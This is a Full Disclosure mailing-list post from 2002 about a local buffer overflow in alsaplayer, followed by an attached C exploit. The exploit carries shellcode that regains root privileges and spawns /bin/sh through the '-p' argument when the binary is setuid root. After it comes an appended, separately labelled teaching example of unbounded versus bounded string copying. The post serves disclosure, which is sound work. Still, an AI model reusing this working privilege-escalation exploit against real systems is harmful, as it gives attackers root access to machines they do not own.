Full Disclosure mailing list archives

Alsasound local b0f (not an issue if not setuid root)


From: dotslash () snosoft com (KF)
Date: Fri, 20 Sep 2002 10:42:27 -0400


I noticed that it is very common in the troubleshooting of an 
application that uses alsa-sound to set the setuid bit on the binary in 
question. One example of this can be found in the archives of the 
alsaplayer mailing list: 
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html 
and
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html

I spoke to the developer of alsasound and he promptly fixed the 
problems. Although he does not condone the setuid bit on the alsasound 
program, the author noted that some users choose to set the bit.

The fixes for the above problem can be found at: 
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/alsaplayer/alsaplayer/app/Main.cpp.diff?r1=1.66&r2=1.67

http://alsaplayer.org/changelog.php3

Wed Sep 18 11:52:43 CEST 2002
-----------------------------
* Code cleanups
* JACK related updates
* commandline buffer overflow fixes.
...


-KF





Attachment: alsaplayer-suid.c

/* 
 * Alsaplayer exploit for a buffer overflow found by KF (snosoft.com) 
 * 
 * This program is not installed with special permissions by default. 
 * However, the author himself does recommend to do so under certain 
 * conditions:
 *
 * http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html
 * http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html
 *
 * Author: zillion[at]safemode.org (09/2002)
 *
 * Tested on Red Hat 7.3 linux with alsaplayer-devel-0.99.71-1
 *
 */

#include <stdio.h>      /* printf */
#include <stdlib.h>     /* exit, atoi */
#include <unistd.h>     /* getopt, optarg, execl */
#include <sys/stat.h>
#include <string.h>

#define BUFFER_SIZE 1056
#define NOP 0x90
#define RET 0xbfffe440 

char shellcode[]=

"\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80" 
"\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68"; 

void print_error(char * burb) { 
  printf(" Error: %s !\n",burb); exit(0); 
}

void usage(char *progname) {
  printf("\n*--- -- -  Alsaplayer b0f exploit - -- ---*\n");
  printf("\nDefault: %s  -f /path/to/alsaplayer",progname);
  printf("\nOption : %s  -o <offset>\n\n",progname);
  exit(0);
}

int main(int argc, char **argv){
  
  char buffer[BUFFER_SIZE];
  char file[30];
  long retaddress;
  int arg,offset=500;
  
  struct stat sbuf;
  
  if(argc < 2) { usage(argv[0]); }
  
  while ((arg = getopt (argc, argv, "f:o:")) != -1){ 
    switch (arg){ 
    case 'f': 
      /* copy the path and NUL-terminate it; stat the -f argument, not argv[2] */
      strncpy(file,optarg,sizeof(file)-1);
      file[sizeof(file)-1] = '\0';
      if(stat(file, &sbuf)) { print_error("No such file");}
      break; 
    case 'o':       
      offset = atoi(optarg);
      if(offset < 0) { print_error("Offset must be positive");}
      break; 
    default :       
      usage(argv[0]); 
    } 
  } 
  
  retaddress = (RET - offset);
  memset(buffer,NOP,BUFFER_SIZE);
  memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);
  
  /* Overwrite EBP and EIP */
  *(long *)&buffer[BUFFER_SIZE - 8]  = retaddress;
  *(long *)&buffer[BUFFER_SIZE - 4]  = retaddress;
  
  if(execl(file,file,"-p",buffer,NULL) != 0) {
    print_error("Could not execute alsaplayer ");
  }
  
  return 0;
  
}

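Added example, not taken from KF's post, from zillion's exploit or from the alsaplayer source: it shows the bug class the changelog entry "commandline buffer overflow fixes" refers to, as a hypothetical option handler that copies an argv string into a fixed stack buffer without a bound, next to the bounded form that rejects oversized arguments, plus the stat() check for the setuid-root condition that the subject line names as what turns such a bug into a privilege boundary. The names unbounded_copy, copy_option_arg, is_setuid_root and try_option_arg, and the 256-byte PATH_BUF, are assumptions for this example.

```c
/* Added example, not alsaplayer's code. copy_option_arg(), is_setuid_root(),
 * unbounded_copy() and try_option_arg() are hypothetical names; PATH_BUF is a
 * constructed size. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#define PATH_BUF 256   /* constructed size of the hypothetical option buffer */

/* The unbounded pattern: the length of `arg` (argv data, attacker-controlled
 * when the binary is setuid) is never compared against the destination, so
 * anything longer than dst overwrites whatever follows it on the stack. */
void unbounded_copy(char *dst, const char *arg) {
    strcpy(dst, arg);            /* no bound: the bug class in the changelog */
}

/* Bounded form: reject anything that does not fit including the NUL, and
 * never leave a partial (unterminated) result. Returns 0 on success, -1 if
 * the argument is too long for `dstlen` bytes. */
int copy_option_arg(char *dst, size_t dstlen, const char *arg) {
    size_t n = strlen(arg);
    if (dstlen == 0 || n >= dstlen)
        return -1;
    memcpy(dst, arg, n + 1);     /* copies the terminator as well */
    return 0;
}

/* 1 if `path` is setuid and owned by root (the condition in the subject line),
 * 0 if it is not, -1 if stat() fails. */
int is_setuid_root(const char *path) {
    struct stat sb;
    if (stat(path, &sb) != 0)
        return -1;
    return (sb.st_uid == 0 && (sb.st_mode & S_ISUID)) ? 1 : 0;
}

/* Driver: builds a constructed argument of `len` 'A' bytes and returns what
 * the bounded copy did with it (0 accepted, -1 rejected, -2 allocation error,
 * -3 accepted but the copy was not byte-exact). */
int try_option_arg(size_t len) {
    char dst[PATH_BUF];
    char *arg = malloc(len + 1);
    int rc;
    if (arg == NULL)
        return -2;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rc = copy_option_arg(dst, sizeof dst, arg);
    if (rc == 0 && strlen(dst) != len)
        rc = -3;
    free(arg);
    return rc;
}

int main(int argc, char **argv) {
    /* Check the given binary (or this program itself) for the setuid-root
     * bit, and show that the bounded copy refuses a 1056-byte argument,
     * the BUFFER_SIZE used by the exploit above. */
    const char *target = argc > 1 ? argv[1] : argv[0];
    printf("%s: setuid-root=%d, 1056-byte -p argument accepted=%s\n",
           target, is_setuid_root(target),
           try_option_arg(1056) == 0 ? "yes" : "no");
    return 0;
}
```

Run it with the path of an installed binary as the only argument to see whether that binary meets the setuid-root condition; the bounded copy accepts anything up to PATH_BUF-1 bytes and rejects PATH_BUF bytes or more, whereas unbounded_copy would have written past the buffer for the same input.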